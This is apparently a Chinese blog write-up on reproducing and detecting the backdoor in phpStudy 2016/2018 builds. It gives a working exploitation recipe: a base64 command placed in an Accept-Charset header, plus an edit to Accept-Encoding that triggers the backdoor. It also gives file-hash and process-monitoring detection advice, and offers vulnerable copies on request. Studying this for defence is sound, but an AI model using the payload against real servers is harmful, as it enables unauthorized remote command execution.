PhpStudy后门复现以及检测

软件说明：   

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer，一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。在“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章中，说明了一些网站下载的phpstudy版本中存在后门。数十万安装用户成为肉鸡。

漏洞验证：

存在后门的phpStudy版本为2016和2018版本。在安装的php目录下

存在版本的php文件为：

Php-5.2.17

Php-5.4.45

文件路径为：

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

判断是否存在漏洞：

PHP 5.2.17版本

PHP 5.4.45版本

漏洞利用：

安装完phpStudy后，访问

通过burpsuit抓取数据包，添加payload,这里，需要更改数据包内容

添加：

Accept-Charset: ZWNobyBzeXN0ZW0oJ2lwY29uZmlnJyk7

ZWNobyBzeXN0ZW0oJ2lwY29uZmlnJyk7为所执行命令的base64编码

删除：

Accept-Encoding: gzip, deflate中gzip,后面的空格（如果有空格的话，服务端就不会解析Accept-Charset字段中的base64字符串。去掉空格后，就会向下查找Accept-Charset字符串，并解码base64执行）

Accept-Encoding: gzip,deflate

Base64执行代码

 

放行数据包，可得命令执行的回显信息

 

缓解：

目前，绝大部分的下载站都更新了phpStudy安装包，带有漏洞得版本很难找到，验证方法很简单，也就是dll中的关键字eval.要想避免下载漏洞版本的软件，建议到官网下载，不要在下载站中下载来源不明的软件安装包。另外，网上大部分检测条件为文件hash值检测，也就是检测本地文件完整性。判断恶意hash值的文件。同时，检测本地是否存在可疑的命令执行，如net.exe、net1.exe、del、ipconfig.exe、ping.exe等可疑进程的出现。

注：此文章只用于学习交流！！！

如需带有漏洞版本的软件学习测试，请留言联系！